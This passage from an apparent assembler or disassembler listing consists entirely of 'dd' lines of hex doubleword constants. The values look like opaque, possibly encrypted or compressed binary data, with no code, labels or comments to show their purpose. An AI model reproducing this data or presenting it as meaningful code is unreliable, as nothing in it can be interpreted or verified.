		dd 9425AF52h, 0ACC82B7Fh, 798B3BA6h, 7E4758FFh,	1AC56BACh
		dd 0F305303Eh, 403E9315h, 0DDC55F2Dh, 2F1A22FAh, 5B225555h
		dd 61F84B51h, 9EEFB2D6h, 6E04DB79h, 1F5CA0C6h, 6870289Ch
		dd 1A673827h, 19AF387Eh, 0ED664553h, 5B195EE7h,	40579CFCh
		dd 963E2EBDh, 0A3BBECEDh, 3FD3CAEDh, 0EC232293h, 73F91A5h
		dd 632E325h, 0B060CA96h, 1D7E68BDh, 30397D12h, 0E960B286h
		dd 24A6BFD3h, 0ED764094h, 68A3289Fh, 914A3F39h,	8F0FD6A7h
		dd 0EB1FFF07h, 4809C0F9h, 79C6AE5h, 0EF422CAh, 0FD0D2FADh
		dd 0C89D16B0h, 6AB249ADh, 0E2832768h, 4BBA045h,	7E131B76h
		dd 4234B6E8h, 0ED2B3AFEh, 0CC83977h, 0F27EB7F2h, 0FC699010h
		dd 42A3C7FEh, 37684D46h, 0F8DD8265h, 3BA77FA2h,	474D7B3h
		dd 5BDCFCAEh, 9C090ED1h, 6A9D383Eh, 8CC4F0FEh, 63B4D06Ah
		dd 26B9FAA1h, 0DAA98D0Ah, 457DDD99h, 34559A29h,	0BCAB83E8h
		dd 0AFD75E6Fh, 0EF039288h, 0FFE4691Ch, 58462781h, 0B27A85h
		dd 0E6248BD8h, 0ACE652AFh, 0E005D307h, 25023B3Dh, 41B485F6h
		dd 783BA743h, 0C8D16BBEh, 5D874BFBh, 22D14921h,	0DE8B654Eh
		dd 846310CDh, 6488FCEEh, 0C186469Dh, 5603DC81h,	5313F8E6h
		dd 3A306E9Fh, 6F4405C8h, 57AA27ABh, 42EC4EF2h, 0D658C0D3h
		dd 1ADE0197h, 209402B5h, 3B7107E1h, 65D8E44Ch, 9878248Ah
		dd 3409A829h, 0ECE59558h, 0EFC85ADDh, 6C72974Eh, 44FFED13h
		dd 0E731835Ch, 0D81665FEh, 613C5E0Fh, 0A022604Eh, 6D08712Bh
		dd 3153DC32h, 0C3FA5D95h, 234ADBAAh, 580C94D6h,	0D8A73110h
		dd 2AC2C4C2h, 41D1F7F9h, 0BAF6F0ABh, 0BDC294BCh, 74CA6B3Bh
		dd 1BC1A2BCh, 837C4A05h, 0F289B8B0h, 3C28836h, 2F437568h
		dd 2CD3710h, 29B9ECEBh,	32152FCAh, 0D10615FEh, 7624AB52h
		dd 878BC72Bh, 41814F91h, 0FEF7666Ah, 67CDDDF2h,	0E90CE12Bh
		dd 312AAF88h, 1109E6D3h, 0B70D9404h, 8A69662Ah,	0D7236CA4h
		dd 8D4F7AF5h, 86E16B44h, 657DC31Bh, 652E0546h, 9DEC1C88h
		dd 0B47D16ABh, 80D7B170h, 171BC1F8h, 42C42E28h,	83A1DCCEh
		dd 6177EFB6h, 0F9F42C76h, 7F1868FEh, 9B39A1E7h,	32999516h
		dd 0D7D68468h, 5B66695h, 104C7B35h, 776A5EA5h, 0BAE088F0h
		dd 21B460C3h, 9128BEA5h, 0C0FC393Ah, 0BBAD841Bh, 86916DFBh
		dd 8101115Dh, 703CF71Ch, 4A61E2F9h, 0C1AD6E6Dh,	0D2F967C4h
		dd 5CE11C89h, 6F8B2CD1h, 0F3DCB36h, 0BFE0F412h,	43862A17h
		dd 3F3E2AAEh, 72318B47h, 233AC2FFh, 7B4A4A84h, 93F51A3Ch
		dd 0ADD6EA33h, 0ED6D101Ah, 0CED102CFh, 0EF680C5Fh, 95654CA9h
		dd 33B8AB2h, 0EE708EBDh
		dd 0ED4556B4h, 0ECD3135Fh, 0E57049D9h, 0D90CD3Ch, 91C3EA65h
		dd 0F5D4451Fh, 6ECC1520h, 70D74DA5h, 0F158164Bh, 0F9B806DAh
		dd 0A0A7DFC4h, 0E8D3B98Bh, 6A7F51EBh, 5C5FA7C6h, 0A1E21414h
		dd 78123ABCh, 67CB73F7h, 0A6E9BCCFh, 2DEE0C0Bh,	5039CF96h
		dd 3F143358h, 6A2F0DD4h, 0AFA56DC0h, 723B8D6Dh,	23896078h
		dd 529DAC52h, 58EE81A9h, 5071A753h, 61EAC357h, 0BA793FC3h
		dd 2D0FCD4Dh, 7FEF72FEh, 0F1AEA395h, 0EFCAD831h, 0EB4A0E48h
		dd 2D5B957Dh, 9575948Bh, 6F866E2Dh, 0B5BFEDh, 786B444Dh
		dd 3A52FCF4h, 86FE2C16h, 59105F7Eh, 37728BC8h, 0B579859h
		dd 0E15317A5h, 524EFD77h, 8116FA49h, 0AD7F84F5h, 5041BEBCh
		dd 8AF77BF7h, 534E53Bh,	7C38675Ch, 88FA5CADh, 3E193F52h
		dd 0E243C927h, 1A2810D7h, 0B3EFE213h, 52C06944h, 0C89FA8ADh
		dd 3077C335h, 8450EE31h, 0D2355232h, 0BAF530AFh, 32EBCB04h
		dd 0DC8BAA59h, 0F523E982h, 0F164658h, 3712F0BAh, 0AF6EFEEDh
		dd 2ACDBAA0h, 3DA75FF1h, 63CAE6A0h, 46A64582h, 422C015Bh
		dd 8E71E0B7h, 26AA4855h, 9393DAFCh, 97FBD1E5h, 38DD53F0h
		dd 1C977121h, 0C5EED3FFh, 0BD040DBDh, 2231DA1Ah, 28C950EBh
		dd 7DA86850h, 0C3F2D20Bh, 75433ADAh, 0C4C6F5C3h, 46BB74BAh
		dd 0EB6A72FFh, 16FE749Eh, 7F5AFECFh, 0AE3960D4h, 17E0C904h
		dd 976F71C4h, 0F59A6379h, 773512D7h, 44E7B9BDh,	0E6942956h
		dd 1A0DBEC1h, 0B1561D09h, 4302B175h, 8D78B6E8h,	0A5070F3Ah
		dd 8AA45D99h, 9DC9CC4Fh, 0F90EEFB2h, 20FC82C6h,	2213435Dh
		dd 2A3996E6h, 0CCDFB575h, 0CB955878h, 3CDB92B5h, 46B89965h
		dd 0FBA39D47h, 52DE9CE0h, 5DD9F2B3h, 526B04BBh,	8B21CD28h
		dd 0A5E1F436h, 0D5E43257h, 7F9614DEh, 41D97C15h, 5A252E27h
		dd 59EA8A9h, 0E85018EFh, 0EC74B4D0h, 15534555h,	0D261C4F4h
		dd 0B83E751Dh, 70098A51h, 2B41D8A6h, 0CBEC6ABCh, 0F9FD4D9Dh
		dd 5FE0BBE5h, 0BB2DF2FEh, 0F7445B20h, 2AC23767h, 0E55A9688h
		dd 918BC758h, 0A31569B6h, 0D40D272Fh, 0AC16D6D4h, 0B2B63239h
		dd 4B723163h, 90982DB4h, 77C4FD1Ah, 0F1CD7E22h,	38A05822h
		dd 6D9A299Bh, 52F04070h, 0DA404FD9h, 0CE01E525h, 7C281331h
		dd 7FBAFF0Ch, 7A5C7670h, 0A2CBAEE6h, 0C5B63266h, 2ABBF2F9h
		dd 0D50C87Bh, 0A0813605h, 0A27F693Dh, 64A2EF43h, 13AD1A8Bh
		dd 4D4E9B86h, 0EFC11654h, 0E1DABD17h, 0B359C060h, 0F0D6B119h
		dd 87121F58h, 15EA9E5Fh, 0FB66BFB2h, 0F0FF1EFFh, 35E097CDh
		dd 0FBC180D1h, 0BDF4510Ch, 0AAFCF5B7h, 0EADE2E7Ah, 87F73571h
		dd 26F31533h, 834AA5EBh, 1E2E83EAh, 668DFBB8h, 0D9885660h
		dd 21E3F7E3h, 43F0CDB1h, 54088E89h, 8C5459F5h, 0FB8CA7BCh
		dd 2D71CAB0h, 0C1972783h, 198CFFDEh, 0E48CDB99h, 23F71D63h
		dd 215476D5h, 0DE872F3Dh, 0FA1E3DE5h, 227E6B46h, 1FBC6BBBh
		dd 0F7B2FC9Eh, 8FA3FF75h, 0C6DF0EFEh, 3E1F76C5h, 36EE7925h
		dd 0E9CED068h, 0D81F4F1Ah, 2CED5247h, 8F8DDF3Eh, 122CDFADh
		dd 0B3F7BF3Ah, 3080F7B7h, 0C29655F3h, 335684EDh, 92C5A4A5h
		dd 968E6FB9h, 2BD81C03h, 4F1DB5CEh, 0E884559Ch,	0F4686B98h
		dd 0C7F9623Eh, 0AAC5BAEh, 0F8FB9A5Ah, 461BE561h, 9DE11D69h
		dd 0DF3EA546h, 2A687D17h, 5AA22B65h, 2BBD2371h,	6B44C7F4h
		dd 53999695h, 7DE4DA71h, 14512BA2h, 0A017A829h,	72EE7E80h
		dd 0F24D971Eh, 0BE8D9468h, 0A043EEA4h, 0C9EB2D9Fh, 0D86DF138h
		dd 0FAACFA28h, 626D830h, 57CA8E86h, 0EA700B98h,	86193386h
		dd 3291968Fh, 0AB32DBA1h, 0D385D57Ah, 3827DCA7h, 0A25A9647h
		dd 5D86FBD4h, 1447D0EBh, 0D4C5A29Dh, 175AFD34h,	57EB429Dh
		dd 3961E91Ch, 0D3DFB1D7h, 4CA719A9h, 33A549Ch, 77B06A0h
		dd 58A30F66h, 9658F45Ah, 17B45A6Dh, 4A5D7E17h, 0BF9A5645h
		dd 73C94F3Ah, 0F778A532h, 0C1362FF8h, 0F17CCC2Eh, 9DA82630h
		dd 0F61DB8D0h, 45355820h, 0BC783C6Dh, 0EF3BD451h, 0ABC21E9Ch
		dd 1A719BB3h, 890D160Ch, 471BD265h, 705034E0h, 4BCCA894h
		dd 0A8097CF0h, 4A5142B2h, 0BAA9732Fh, 1E0F1EDEh, 27DDA0D8h
		dd 4A17DF29h, 0A84038Ch, 0D269895Ah, 0F494547h,	3B038856h
		dd 31BA1EFFh, 385EE15Ah, 0C574EFACh, 0FC717D59h, 0DC78D5CBh
		dd 133558DAh, 4AFF7130h, 0FD70674Dh, 0FCBBE891h, 0E0F13D7Eh
		dd 695E3D5Bh, 57F9DD12h, 46F838A5h, 97ECF7ECh, 311A00E3h
		dd 5776D6B1h, 11D8CB88h, 0EB7940Fh, 0A7F67B78h,	4DC95B60h
		dd 0D3F08C3Eh, 0CEC324B4h, 0FBF03E1Fh, 0A194E90Fh, 73B555D8h
		dd 8FC4A03Ch, 0A5124D3Ah, 0A5CD7B39h, 38E590C7h, 0E091AD1Dh
		dd 799AAF06h, 6DCACBFDh, 134B88C4h, 1FE1115Eh, 84C98EF0h
		dd 3317D9A5h, 0E264BC4Bh, 0BA857996h, 0DBD923BFh, 0A3035ED1h
		dd 0E255F476h, 0D614B89h, 0F157EB5Bh, 35D277B4h, 29E9FCAh
		dd 0F1AF563h, 927E512Ch, 8F8F97A2h, 95BDDD71h, 769DF9ADh
		dd 0DC58D3AFh, 310E2FBh, 9AD342Eh, 4C35757Fh, 3AB0651Dh
		dd 0FACA2DD6h, 8A5E0CF6h, 76B9CBh, 3A9F4BDEh, 2D17D6C9h
		dd 874C8A54h, 0C706BFC6h, 0E739E06Dh, 4A205F0Dh, 201881EFh
		dd 4BD9762Fh, 6EACD362h, 33F85783h, 6EEDBC5Ah, 5E8F06FBh
		dd 2A5124DFh, 8722B8BFh, 974D183Dh, 0A38C2C5Fh,	0C9C3A891h
		dd 0E9672C1Fh, 6C0755F4h, 0DD0D7A39h, 0D4ED1B92h, 0B65AFABAh
		dd 58431ECAh, 0B92440E8h, 0B092B03Fh, 0AFADD3ACh, 0DBB94568h
		dd 0CDDC2976h, 9BB3116h, 8EA73309h, 0C49D03CBh,	5785F7F7h
		dd 0E369ECC1h, 508AF587h, 0EA2FF705h, 636A8B9Ah, 0D35C8AD1h
		dd 5FB11DA5h, 242EE612h, 8742733Ah, 0C7AA093Dh,	0D84F6C37h
		dd 0CD316576h, 24D7652Eh, 64A675D3h, 0B5F8E238h, 0A81F6AA7h
		dd 91C4C1FDh, 60559882h, 4B4691DAh, 0E052D636h,	29298F3Ch
		dd 95F9179Bh, 4FE47B6h,	0F470197Fh, 53741D8Dh, 0BE2E7795h
		dd 0D79C7B83h, 3F41190Fh, 92B81E79h, 2B5951FEh,	4B2D0B56h
		dd 0F817BE2Eh, 0E1E023DBh, 0B9BF5B9Ch, 0FA95785Fh, 0D8FAC30Ch
		dd 0A351262Dh, 0D0486AA0h, 333E9ABFh, 0E1AE46FAh, 56914607h
		dd 0E87E9ED5h, 5479AC15h, 0C1673E67h, 95EB20E7h, 0A557EF0h
		dd 285D1E16h, 5E38925Fh, 354EEC19h, 0E7172DF7h,	0D365E4E6h
		dd 8CB592CCh, 0CE4AB7A3h, 3BA1AD33h, 0ACA2D4D4h, 0CA7E824Fh
		dd 21024755h, 0A36A41E7h, 8FDFE0F1h, 7CF6E721h,	0F8FDECDDh
		dd 0AA490D5Dh, 3C41A93Bh, 0E1699B5Ah, 4FF7602Ch, 96A9163Eh
		dd 860F1A13h, 0B0611AEBh, 5271DF20h, 66DA9CAEh,	2C088843h
		dd 0F010309h, 0BE74DEBEh, 287E6504h, 4DB3257Ch,	0F7DD21FFh
		dd 0B5F103D8h, 70203E1Eh, 0E5F39929h, 0A46669D0h, 9B8E87AAh
		dd 0DEBB7FA8h, 0A7481522h, 9E3AD0F5h, 0B582BC74h, 5D991BEh
		dd 3F71546h, 828EF66Fh,	0D1D8BF14h, 0BCD4275Eh,	0EB8EEA3Ah
		dd 0E3539475h, 3688C53Ah, 0F66A6F21h, 2AEF3AAAh, 9F87633Eh
		dd 0EAFF3E72h, 23F0782Eh, 68D2A781h, 146DDB69h,	0C65FBE32h
		dd 8CDF1FC6h, 0B113CFABh, 0AC037B02h, 0EAA8CCC6h, 1FC30BC5h
		dd 0C4B7E492h, 0C645EB4Ch, 2F9C96E5h, 4A8BA6EAh, 74D66EDEh
		dd 0B4074958h, 0F2875C25h, 56392FADh, 0DAEEE43Ah, 2404C4B6h
		dd 0E28F0F2Eh, 5EF1378Bh, 8FBC04D7h, 35D3C18Dh,	6A6C7C96h
		dd 66BBE8B4h, 624DDD21h, 0B48978C1h, 59DF9257h,	62E727F6h
		dd 0B8F9041Fh, 3B46219Ch, 0B083BC75h, 0B1B5DEA2h, 0A85368A6h
		dd 3006D5BFh, 0E57D40A4h
		dd 9C7EE56Bh, 95E73287h, 0BB6EEFB6h, 55F7105h, 0E946E5B8h
		dd 0E6B3DEF3h, 555CDBAAh, 3EBD5143h, 0D1F45860h, 6EBBEB2Ah
		dd 37A26E1Dh, 0DA36C282h, 8E3771CAh, 0AAF43A01h, 6A5C17D2h
		dd 6951C270h, 95C5BC7Fh, 7FFA55B2h, 0B2A6F040h,	0DC001528h
		dd 0FAB1B13Ch, 42962C99h, 3E2634D0h, 0F7D15AD4h, 0B37E3E1Dh
		dd 3C8FF909h, 0E1436468h, 40B787C1h, 71350FF3h,	0A64A2E5Fh
		dd 5A3CA0FFh, 9F6EF11Bh, 58C934B6h, 76896D1Ch, 39A71B1h
		dd 62C3CD96h, 9F2BE0F2h, 6F9A2B6Ah, 0CDC211B7h,	0CB29EA88h
		dd 7A30B41Bh, 21F842D6h, 0C5579A46h, 119E3E57h,	0A66EC1F2h
		dd 66BC8766h, 0DAE591F5h, 0A3F97BC1h, 72CB4779h, 73BE3DE6h
		dd 0D024284Ch, 178FFD7Eh, 291F40A9h, 0BAE1E213h, 2FB89716h
		dd 4D748368h, 0F4A59844h, 0CF22C3A4h, 4307328Dh, 0DE211567h
		dd 0C2E5C69Ch, 0A6DF73DFh, 0FEE2245h, 5DCE9B2Ch, 0D168EE0Fh
		dd 2EE012FBh, 0DF92AD65h, 1255129Bh, 16999E5h, 0D41405D1h
		dd 12D15E92h, 0DE4A13B6h, 786BE029h, 0AE532D1Ah, 0D4D06734h
		dd 7DFAC352h, 49E9ACAFh, 0F1FC2D40h, 360B7DDCh,	65543E77h
		dd 0F8748AA0h, 0B454ED3Eh, 2A02C6B1h, 0B93D4B75h, 0EE5989E8h
		dd 0E512A4CEh, 0A9580AB0h, 0EB168800h, 16C8BA1Fh, 98FC2494h
		dd 3B91FC98h, 15AD1515h, 4122B17Dh, 0B2EADFA1h,	2761A168h
		dd 0E079EB10h, 548274ADh, 49141C6Bh, 6F4472DCh,	4B0687E2h
		dd 8B7C96D5h, 60EC11E0h, 0AFF6B974h, 7B78BB22h,	74CB8A11h
		dd 88B0C268h, 0ADE8709h, 0F8B883EDh, 2E4F14B2h,	0C4A8325Ah
		dd 9689AE5Bh, 0B6BE9EF1h, 5D432ACCh, 0D2DE7156h, 0D757D496h
		dd 0FAFEC1B4h, 0FE1E4004h, 280AC20Ah, 0EB24574Ch, 2993D775h
		dd 6B5D3968h, 0C515B1E4h, 0F0951E13h, 0D1B53703h, 6C9EDD7Dh
		dd 309210Bh, 0F1171DC5h, 0E4B80F9Bh, 0CB3F6E0Bh, 0BC922162h
		dd 34A092B6h, 2758C84Dh, 71790A15h, 0E155A131h,	8F8588ACh
		dd 3EB532AAh, 0CA3ADEB1h, 5B024D2Dh, 5ABC1733h,	0F4EDFD82h
		dd 0A9975F8Eh, 2A16F415h, 95D7A68Ah, 3681B443h,	35AA074Dh
		dd 0FC45BA9Bh, 0F1665844h, 24A65095h, 0A9BB7F91h, 1F02E11Ah
		dd 9400FA0Ch, 6101098Bh, 8597B443h, 524CFFF4h, 8B6D7B5Dh
		dd 67F9E5C9h, 8E17CBF8h, 5B58FB5Dh, 24650D77h, 0BD42140Dh
		dd 6DC01094h, 0BCDDF4F8h, 0DB1D57F9h, 0C704E033h, 0DAE58707h
		dd 0D3D0035Eh, 0A2FEA9CEh, 0A78DF652h, 0F2D5EDE7h, 1B69F6ABh
		dd 4270771Dh, 0E7F4766Ch, 0C457703Ah, 669E8CCBh, 0A281DFB1h
		dd 76E1ECF4h, 5D6C5A53h, 49C6A823h, 0A8D12B9Eh,	5AD9D741h
		dd 2EA2A7BDh, 0A3AA1EABh, 0AE4D41h, 81F5FDF1h, 7BF9CB19h
		dd 94164E2Eh, 9B2A017Fh, 7A4D29B8h, 2AE5E3A0h, 0E9D2F0C8h
		dd 1A97794Eh, 36B8F2EAh, 7E789D94h, 2F95E9C5h, 12196FF2h
		dd 0AEF51B44h, 672E929Ah, 2A802B4Bh, 0EF30B439h, 0DEF1A240h
		dd 3CBAB5DAh, 0A332E530h, 0DD65BCC3h, 90612FE8h, 9FFA7512h
		dd 0BB659DDAh, 0B350CCA9h, 0D2F95F59h, 0C9E61DBBh, 412CB51h
		dd 63A244Ah, 6AA66EA7h,	0FB360617h, 0B8284FCEh,	0B142A9ACh
		dd 0F559B07Ch, 8F2F8DFDh, 210E30FEh, 0C95F4295h, 45D56F69h
		dd 80C50494h, 0A6684284h, 6B1486h, 0AE8B61E6h, 0B65D9EB2h
		dd 87C3B9B3h, 66D0EF15h, 0C93FFBD1h, 89FFDC96h,	86DD85Dh
		dd 7E3B144Ch, 7607B038h, 85AF98D4h, 0F6B7CDD5h,	5668F1A9h
		dd 0AF68C261h, 0A5D81FD6h, 823259B0h, 0DA7D9745h, 4B45E6B5h
		dd 78AB79F5h, 97DF4091h, 0CC668615h, 8CD45D5Fh,	0EAF0D7BEh
		dd 79E8172Ah, 71BCC24Dh, 2147D59Ch, 9FF309C8h, 36F279A8h
		dd 4D3CFC78h, 0ADBE2392h, 0C34A9CB9h, 39DE8A43h, 25F78F8Dh
		dd 0AEC989EDh, 0C8BF42FCh, 0A6FB3EC7h, 769BEB3Fh, 0D1817881h
		dd 8315C77Dh, 697F17D6h, 117F5E86h, 1DD77B97h, 8D21838Ch
		dd 8DBA24E3h, 0BA70A081h, 614FE7A4h, 0E1494B8Bh, 38BE7D8Eh
		dd 26336E93h, 0CCFD9B06h, 9FDF03EBh, 43CA2472h,	0BEA7D3EBh
		dd 0DF60B5FCh, 3654404Ah, 0F768C0F0h, 74116E59h, 9E086CD0h
		dd 0E57A2E26h, 6D514E1Ch, 1B1B907Fh, 10B57F35h,	173F7C74h
		dd 0A3530677h, 38D6542Ah, 0E4F5B46Bh, 42F849D3h, 81E19D9Bh
		dd 126DE135h, 0F40D496Dh, 2B7CA94Ah, 0B54B51D1h, 35F21755h
		dd 68625F73h, 643F575Eh, 7C2A5F9Bh, 25B0194Ah, 695514FAh
		dd 2E117D0Fh, 0FC9A09CCh, 0AAAAB802h, 3E878526h, 0FA60C6C9h
		dd 0F556E0E0h, 0F5FA20FBh, 0A5883B2Fh, 0E55EDE8Dh, 0DBC9EEBBh
		dd 0F29E571Bh, 0EE34EBC2h, 0D80A08AFh, 0CAAF5DFBh, 9778D0EBh
		dd 0A6E7C77h, 9E42D8C9h, 0ECDB52ADh, 895CD1AEh,	0EACA72B5h
		dd 8D6C17F6h, 0E2E5E93Dh, 0B50228CBh, 663CBDCCh, 92A3C05h
		dd 7B550B9Fh, 2B47B537h, 0D5EDB17Fh, 61F9027Ah,	0A95E59A7h
		dd 0F2A4181Fh, 886F4D7Eh, 3E716958h, 7A341498h,	0B25CBEDCh
		dd 0F555F415h, 6B6A68EEh, 1E7B74A6h, 68A19FE7h,	0FE3854D0h
		dd 4BA7F89Ch, 0AE6012F7h, 0AA1DFDC4h, 0C1F07B17h, 0E5F5D747h
		dd 172EC540h, 0EAAA3CCEh, 2FED43ADh, 897DACB3h,	0D0CAE6E2h
		dd 4056EB5Fh, 57ADCCD3h, 4D59C74Bh, 0F4F1AE1Fh,	48D1A133h
		dd 85C7A0A9h, 0CB753FD1h, 5917E8A5h, 0EA7384CCh, 0A041F044h
		dd 0C38AA236h, 0ADF7D4F7h, 1A1EF6AEh, 0D48440FBh, 0B8EE02BBh
		dd 7A336140h, 89C6C417h, 2DCE5015h, 0BE061F8h, 6F0A9C42h
		dd 493724ABh, 2628BA98h, 0A31F96CDh, 0E07E5DBEh, 0DC6221ECh
		dd 0A78FF928h, 0B2AFA4D8h, 0A7A8116Eh, 7F0CDDEDh, 595F888Ch
		dd 39FED0E6h, 0B3F35B11h, 17C05596h, 597BCACFh,	6A3CFBBAh
		dd 75FBF0EDh, 72AF0739h, 0D5893E03h, 370DB505h,	64A96641h
		dd 1637ED6Dh, 0A22FDDh,	5A129CE5h, 7754B5B0h, 0E302FA38h
		dd 0FDEF62C0h, 0A3E5DF21h, 9F6E5D05h, 8B2F2D7Eh, 95767ABEh
		dd 0B93D2F90h, 0FECCA63Eh, 51E28078h, 52AB29ECh, 0BF317D8Eh
		dd 60A42E8Fh, 266CC0F5h, 117EE07Ch, 99A19A0Fh, 0A9370DA3h
		dd 0AF8CDEBEh, 0C9B8792Fh, 46C53D54h, 5E1ABADEh, 8EAB4A39h
		dd 2B47B922h, 165F6DD5h, 0EF6DA2Bh, 0A72F06ABh,	1EFB4E9h
		dd 513BA47Ah, 2B4FF22Fh, 2E024C92h, 0D6C455A3h,	27194AEEh
		dd 143476h, 4766192Eh, 0F70D4A50h, 1144B6EFh, 29FA77C4h
		dd 0D0E37735h, 0C24B8A46h, 710BCE07h, 13A95CD4h, 3209F221h
		dd 38771F1Ch, 0CF625126h, 0B67BD6F4h, 184AAF54h, 0AE5F240Bh
		dd 0D4C677CFh, 895EC1E5h, 0B13A3416h, 5705C573h, 0AB71F207h
		dd 0C8108DFFh, 0E6B96D6Bh, 0B9D862FEh, 1A0487Bh, 45F68F5h
		dd 5F1D5F03h, 0A7A2B848h, 0F86CE730h, 8CD8E3D6h, 27F6F437h
		dd 5B0B3EC6h, 56BF8825h, 0A5FE4C73h, 97D6FE64h,	0BFCCDC9Ch
		dd 6092940Bh, 41BC6AABh, 75E11758h, 0D938D5D5h,	134BB527h
		dd 6AD3F3E8h, 155955F1h, 4B596BADh, 7EF9FDCEh, 491EC0F2h
		dd 0D7E90A23h, 4BA51D3Fh, 8B185C76h, 1440CABBh,	69165099h
		dd 3B1AADA6h, 0A1680A20h, 0C46FCC1Ah, 88EC2985h, 0BC735F25h
		dd 9331E0FAh, 43AB44A5h, 776489A6h, 1B252FA3h, 358F324Eh
		dd 7FF7DDD5h, 65B216D8h, 2CD50AA5h, 4703580Dh, 72E5CC5Ch
		dd 0D49ED7FCh, 1FCAAA94h, 0C6EB6229h, 1028C697h, 487E92C4h
		dd 77CE673h, 0ABF537A1h, 0CD1C923Dh, 4DA77168h,	0B1C95CA0h
		dd 0A5ACAA1Eh, 5C7A7C59h, 79ACDE47h, 0E24D34D2h, 0C0CBF1E3h
		dd 516B05E0h, 874CFCB3h, 1090F3B9h, 4862F72Ah, 7E074C78h
		dd 0EFCBF97Fh, 2A96C78Dh
		dd 0CBB72D73h, 0ED4A660Fh, 0E308A6A8h, 696AAE02h, 0A5A2B5B5h
		dd 0C760EC01h, 4AAFD9D0h, 4508159Ch, 865366C5h,	0C2328AEDh
		dd 0BDEA120Ch, 3B5A01FFh, 65FF14B5h, 5C7E1F1Eh,	0A4C01551h
		dd 8D6A4125h, 6A7ADB20h, 58291109h, 0C49B8B6Dh,	346B436Ch
		dd 336D91A2h, 922944BAh, 588EA9AAh, 41155F52h, 0A192A9F6h
		dd 0EE5DD831h, 0F2C2AC0Fh, 0F141B682h, 890544C7h, 0BEF032A5h
		dd 0E98FBABAh, 0F0170A2Ah, 4ACE1482h, 3F1ED454h, 4E3DE820h
		dd 0D369E46Bh, 3E8655BEh, 923D288h, 0C60647BFh,	6B5EDBBAh
		dd 0D7E79FABh, 0ED405FA0h, 2E2695Bh, 577CFC60h,	0C7152FA3h
		dd 169A5C83h, 0CAAFA2B2h, 7AEAAB22h, 51D19B6Ch,	0BF2EAFB0h
		dd 5A21CD39h, 0B74DBCB9h, 89A211BCh, 0B82542EBh, 497CBDD0h
		dd 0E7C0E380h, 0FC5AAE78h, 6D73F316h, 0FBFC0A74h, 6DE82198h
		dd 0F1C6A956h, 0FCF9D878h, 1AD87E05h, 0DBAD1AA4h, 393D0919h
		dd 0F943B14h, 0DBB8653Ch, 365E5671h, 82BDAFCEh,	0A396C7A5h
		dd 96073A5Ah, 5F8E8927h, 2A7D7C07h, 94CA4DCh, 0A3D9F48Ah
		dd 0A8813796h, 15DB45A6h, 0C0339860h, 17C5E12Bh, 0D731CAF8h
		dd 0A14BC695h, 0ED5F2B66h, 3113F2F9h, 0D422E7D7h, 641245ECh
		dd 0EDF3EACFh, 0E760E6DEh, 0B1E08F61h, 3D24931Fh, 5BD7FB7h
		dd 3A5B33F4h, 0D87CBCC8h, 2AA9FF68h, 48D7D094h,	2FD3B32Ah
		dd 61CA275Fh, 0E26CD4B3h, 90E43B5Ch, 0A5381A84h, 25286110h
		dd 1B68AACFh, 0F4010D88h, 252A5135h, 44E83427h,	17F4D439h
		dd 91BFA269h, 0D303BE3h, 0E16A42EBh, 0F79E0A41h, 0E4E8A62Dh
		dd 9E4CE2DBh, 0D1C844E6h, 6255661Fh, 6E92C050h,	0A83B8B3Eh
		dd 519FB031h, 0BD139CABh, 0E361C4EBh, 0FB28E0FAh, 0F5F9C32Fh
		dd 0BB3D306Ch, 89FCD3E2h, 5130DAB7h, 0EB54C540h, 2B4AB29Ch
		dd 76751689h, 605C31E7h, 0AD502A35h, 0E97BC0F1h, 55F6A5Ch
		dd 6A5FF9A7h, 8FBA74A3h, 150C061Fh, 1C32E41Eh, 7FA7CF78h
		dd 1BFBEAEBh, 5A39BB41h, 0B0D8E07Ch, 78EAE93h, 5F67E119h
		dd 6ABA903h, 0E360A381h, 0DD5ADA07h, 0D66AFB0Fh, 9988404Eh
		dd 70E2768Eh, 1E9117D9h, 0FBC6D965h, 1E39A28Ah,	0B605C71Fh
		dd 0AA1B5FEAh, 0CD57DD44h, 0F363DB85h, 2D09C714h, 77A37DDFh
		dd 854F7FF7h, 0C50257FDh, 0B88E555h, 8F3BE2h, 4ADA2EBh
		dd 7DE0AE15h, 57EB3B5h,	773A20AFh, 40DD8B95h, 896C13FDh
		dd 5DD4615Fh, 0D29F499Ch, 0CD618BA8h, 2B0FDAE0h, 0B83222A0h
		dd 0C97F7C12h, 0B1BB95C0h, 73440546h, 0F2AB55B7h, 4C0E57B9h
		dd 4EEB9DCh, 68DE1B9Eh,	0C94AF335h, 5589EA16h, 0EE03AF21h
		dd 0EA2B4C55h, 6FEE8B2Fh, 0D6DFE9E1h, 0E2B8D497h, 0ADE13CFFh
		dd 0F0B1006Dh, 543B30F2h, 0CB03EAD9h, 9C3834EAh, 7A83A846h
		dd 0BB9CF93Dh, 26DC8940h, 8724FB46h, 0A030795Ah, 72F59E1Eh
		dd 1BCBA1CEh, 17CECA76h, 0C150E286h, 87D0DB51h,	155D8063h
		dd 0C621B664h, 0D509BC2Bh, 0FC1E77C2h, 373E6BB6h, 0D7E13440h
		dd 0A3ED7B9Eh, 0CF30FD4Bh, 0A9C32DA8h, 0E1528079h, 98D34575h
		dd 52A4AF27h, 7D60D685h, 0A43BE2E1h, 81E47BCFh,	3E1A946Dh
		dd 8CAADF78h, 0BD42097Fh, 250E4729h, 90E4E1BFh,	5A2E1383h
		dd 5766510Ch, 0B7713215h, 82F7A4FCh, 95B215F9h,	2CC3CBB3h
		dd 0EAB75D5Bh, 0AD2AF6E8h, 6BE42D31h, 3E28F8F1h, 0DDCC0BECh
		dd 0AC01014Ah, 0A50F4B43h, 4F685CA5h, 0EE96EF7Fh, 0AF3198D1h
		dd 0EC9C655Ch, 0AD3D1F9Bh, 4BFABF83h, 7E0FD6FCh, 0E3CF2910h
		dd 0BA8BCCBFh, 0E1D0FB94h, 79F75501h, 0E0529AA0h, 0C0BEE163h
		dd 0E58715F6h, 22684F89h, 377246B7h, 0F416A092h, 0D5D7AAA1h
		dd 0B7D24333h, 9B41F69Ch, 2CB62041h, 6E2173Bh, 0FC5A9566h
		dd 5DB167FEh, 0E8525C69h, 0B4909277h, 0DB55FB17h, 0DEF0BE42h
		dd 0B2A4019Ah, 688A2A31h, 0CD764397h, 2762CDA7h, 0EA8C030h
		dd 0B28C191Eh, 75E1BF65h, 61A0371Fh, 85AFFD7Dh,	0AFB1E3E3h
		dd 8FF6C3F8h, 9C9BBF12h, 64419E5Ah, 0CC0F4EC4h,	2747FDBFh
		dd 0E275ACEFh, 0F38BBA87h, 0B1AC71F1h, 5C747E9Fh, 3F1DAED9h
		dd 0ADFE4CB4h, 25A3F392h, 0C54C928Dh, 0DB42C5E0h, 47705BDAh
